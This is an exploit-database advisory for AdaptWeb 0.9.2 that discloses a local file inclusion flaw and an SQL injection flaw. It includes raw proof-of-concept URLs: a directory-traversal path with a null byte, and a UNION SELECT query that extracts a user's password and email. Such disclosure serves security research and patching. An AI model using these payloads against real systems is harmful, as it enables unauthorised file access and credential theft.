AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities

vendor:

AdaptWeb

by:

SirGod

7,5

CVSS

HIGH

Local File Inclusion and SQL Injection

22, 89

CWE

Product Name: AdaptWeb

Affected Version From: 0.9.2

Affected Version To: 0.9.2

Patch Exists: NO

Related CWE: N/A

CPE: a:adaptweb:adaptweb:0.9.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities

AdaptWeb 0.9.2 is vulnerable to both Local File Inclusion and SQL Injection. The Local File Inclusion vulnerability can be exploited by sending a specially crafted HTTP request containing directory traversal characters to the vulnerable script. The SQL Injection vulnerability can be exploited by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script.

Mitigation:

Input validation should be used to prevent the exploitation of these vulnerabilities.

Source

Exploit-DB raw data:

#################################################################################################################
[+] AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities
[+] Script : http://adaptweb.sourceforge.net/
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

[+] Script homepage : http://adaptweb.sourceforge.net/

[+] Local File Inclusion

- PoC 

   http://127.0.0.1/[path]/index.php?newlang=../../../../../../BOOTSECT.BAK%00


[+] SQL Injection

- PoC

   http://127.0.0.1/[path]/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1

#################################################################################################################


# milw0rm.com [2009-06-15]